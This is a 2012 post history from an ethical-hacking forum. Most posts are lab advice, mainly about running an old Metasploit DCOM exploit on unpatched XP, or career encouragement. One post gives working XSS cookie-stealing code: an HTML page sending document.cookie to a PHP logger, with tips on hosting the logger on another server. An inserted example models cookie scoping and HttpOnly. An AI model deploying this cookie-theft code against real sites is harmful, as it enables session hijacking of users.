EH-Net
May 22, 2013, 04:09:44 AM
Show Posts
2
Resources / Tutorials / Re: ms03_026_dcom help please
on: May 28, 2012, 06:48:00 AM
+1 to what unicityd wrote.
@ZeroOne I agree with you on that. But as unicityd wrote ... it's not the point to have a working exploit with which you can hack a gazillion of machines, but to learn how Metasploit as a tool functions. And here I think for learning purposes it's totally fine to follow along an "old" exploit just to see what options there are, how to use them ...and so on... So, see it as a "walk before you can run" thing ;o).
One thought on "who on earth will be using XP with no SPs", though. Think about all the people who run a stolen/hacked copy of XP (or Vista or Win7) on their machines with update services disabled in panic of not getting caught ... I heard this can be quite common in Third World countries. I don't know any statistics to show this though... it was just a thought...so please don't get me on this ;o)...
But you are probably right, in times of Vista, Win7 an unpatched copy of XP might be rare... (at least I have no personal experience about that...)
@cyber.spirit I think the patch was originally after SP1 (or 2) and then later added to the SPs... that's why we still see Win 2003 in target range in Metasploit (was that your question?!?)...not sure about this though...
I really like the videos on securitytube. I am quite a fan of the "visual learning approach"....since I can better remember things when someone has shown me how to do it.
Anyways, have fun with the video series!
3
Resources / Tutorials / Re: ms03_026_dcom help please
on: May 27, 2012, 01:07:42 PM
Hi cyber.spirit
I guess you go through Vivek's videos on Metasploit, right?!
As far as I know the RPC-DCOM exploit has been patched in SP1 or 2 ...not 100% sure at the moment.
However, the exploit will definitely work with an unpatched Win XP - so no SPs (I tested that). Also make sure to disable any (Windows) firewall.
4
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: php script is not getting session cookie...
on: April 14, 2012, 03:51:39 AM
Hi wlandymore,
OK, this might sound odd - and it's just a thought ...so don't get me wrong, but do you start your HTML file in a "server context", meaning is it in your htdocs or do you just open it on your hard drive?
Since if you do the second it won't work or at least you cannot read the cookies from localhost ...(Happened to me too...an alert box on the page worked, however the PHP script couldn't read cookies...).
For "debugging" try to throw both scripts in your htdocs ... and look if the PHP script gets the cookies...
Don't know if this helps, was just a thought....
Cheers, -gromic
5
Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: need a little help with a cookie grab script...
on: April 08, 2012, 06:41:27 AM
Hi wlandymore, hi ajohnson
The following code (cookie_site.html and cookiestealer.php) should work (seems that you just missed a / before your stealer script redirect in your HTML page). I tested it via a XAMPP setup and it worked. Just throw both of the files into your XAMPP htdocs.

file: cookie_site.html

    <html>
    <head>
    <!-- set a test cookie for this site -->
    <script type="text/javascript">
    document.cookie = "Test123";
    </script>
    </head>
    <body>
    This page is a test
    <!-- show what the page's own script can read -->
    <script> alert(document.cookie)</script>
    <!-- redirect to the logging script on the same server (note the leading /) -->
    <script>
    document.location = "/cookiestealer.php?cookie=" + document.cookie;
    </script>
    </body>
    </html>

file: cookiestealer.php

    <?php
    // read the "cookie" query parameter and append it to cookielog.txt
    $cookie = $_GET['cookie'];
    $log = fopen("cookielog.txt", "a");
    fwrite($log, $cookie ."\n");
    fclose($log);
    ?>

Note:
- So far, page and stealer.php run on the same server (I know...not intended). When you move your stealer.php to another server you have to adjust your path, i.e. "http://<Server IP>/cookiestealer.php?cookie=" … and so on..
- One more tip: When debugging your scripts make sure you delete your browser's cache each time... very often I changed something but my browser (Chrome) still showed me the old results
- Cross-domain issues shouldn't be a problem since as far as I understood the idea was to place the "stealer script" on a site which is vuln to XSS and steal the cookies related to THIS site, right? If you want to read cookies of another domain you run into "same origin" issues..
Hope this helps and works for you.
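
The cookie-scoping point in the last note above, together with the htdocs-versus-hard-drive point in the April 14 post, modelled as an added example that is not part of the original posts: it computes which cookies `document.cookie` would expose to a script on a given page, which is the check to make when judging what an XSS on one site can and cannot read. Assumptions: the hosts `shop.example` and `bank.example` and all cookie values are constructed, the RFC 6265 host-only/Domain rules and the HttpOnly attribute are not mentioned in the posts, Path and Secure are left out, and `file:` pages are treated as having no cookie jar (browser-dependent).

```javascript
// Added example: simplified model of what document.cookie exposes to a page.
// Hosts and cookie values are constructed; Path and Secure are left out.

// RFC 6265 domain-match: same host, or host is a subdomain of the Domain value.
function domainMatch(host, domain) {
  const h = host.toLowerCase();
  const d = domain.toLowerCase().replace(/^\./, "");
  if (h === d) return true;
  const isIp = /^[\d.]+$/.test(h) || h.includes(":");
  return !isIp && h.endsWith("." + d);
}

// cookie: { name, value, setByHost, domain?, httpOnly? }
function visibleToScript(cookie, pageUrl) {
  const url = new URL(pageUrl);
  // Assumption: a page opened from disk (file:) has no cookie jar. This is
  // browser-dependent; it matches the behaviour described in the posts.
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;
  if (cookie.httpOnly) return false; // HttpOnly cookies are hidden from scripts
  const host = url.hostname.toLowerCase();
  if (!cookie.domain) return host === cookie.setByHost.toLowerCase(); // host-only
  return domainMatch(host, cookie.domain);
}

function documentCookie(jar, pageUrl) {
  return jar
    .filter((c) => visibleToScript(c, pageUrl))
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Constructed cookie jar for two unrelated sites.
const jar = [
  { name: "session", value: "Test123", setByHost: "shop.example" },
  { name: "prefs", value: "dark", setByHost: "shop.example", domain: "shop.example" },
  { name: "sid", value: "abc", setByHost: "shop.example", httpOnly: true },
  { name: "other", value: "x", setByHost: "bank.example" },
];

console.log(documentCookie(jar, "http://shop.example/cookie_site.html"));
console.log(documentCookie(jar, "http://bank.example/"));
console.log(documentCookie(jar, "file:///C:/xampp/htdocs/cookie_site.html"));
```

In this model the `sid` cookie never appears in any result, which is why marking session cookies HttpOnly limits what a script injected into the page can read.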
6
Resources / Career Central / Re: What now ??
on: March 05, 2012, 11:16:40 AM
Hi Jamie,
I am really sorry to hear that with your job. I second what everybody has written so far. From your posts here on EH-Net as well as your site you seem really passionate about ITsec… So DON'T give up!
"Our greatest glory is not in never failing, but in rising up every time we fail." (Ralph Waldo Emerson)
Since I am still in my master's and job hunting for me won't start before August, this is the only "real advice" I can give you: "DON'T give up, if IT-Sec is really your passion!!"
If I were in your situation, though, I would first ask your employer for a talk to elaborate on the exact reasons why they have fired you. This might hurt, but will give you valuable information on what you can improve the next time.
Second, I would right away start to apply for new pentesting jobs. Don't let the "feeling of being not good enough" let you down or discourage you and get right into the game again! And only if this won't work out for whatever reasons ("too little job experience", "too young"… blah blah…) try to get a job as admin or what else… to build a solid foundation (always with the goal to learn something new... so no "brain death" jobs). And never forget to focus on your goal or "dream job"!
I wish you good luck and all the best!! And again: Don't give up!
11
EH-Net / Greetings / Re: Hi, I'm New Here
on: January 23, 2012, 01:10:10 PM
Welcome blue_hat,
With programming languages it is always a matter of "the right tool for the right job". So as cd1zz mentioned it always depends on your goals.
Nevertheless I think it is always good to have various programming languages on your "tool belt" since very often they help looking at problems in different ways. Because when holding only the same hammer in your hand ...every problem somehow always looks like a nail... (and maybe not like a screw...)
Again Welcome to EH-Net!
12
EH-Net / Greetings / Re: Good day ...
on: January 23, 2012, 12:48:47 PM
Hi CeemGee and Welcome on EH-Network! Looking forward to read more from you in the future
13
Features / Opinions / Re: My website comments, feedback and more
on: January 23, 2012, 12:45:24 PM
Hi Jamie,
Love your new design!! (I have also been a visitor of your site when it had the old one.) Wow, I am jealous, since setting up a page/blog has also been on my to-do list for quite some time now (the domain is already set)... and your site is just what I had imagined.
Maybe a bit off topic, but I found out that you have removed the Syngress XSS Attack book from your "future" reading list (if I can remember it right). Any reasons for this? Since I bought it the other week and think it is quite an interesting read (read the first 100 pages so far). Reading it always makes me shiver of what's all possible with XSS...
Anyways... getting back to the topic... Great page! Good luck with it!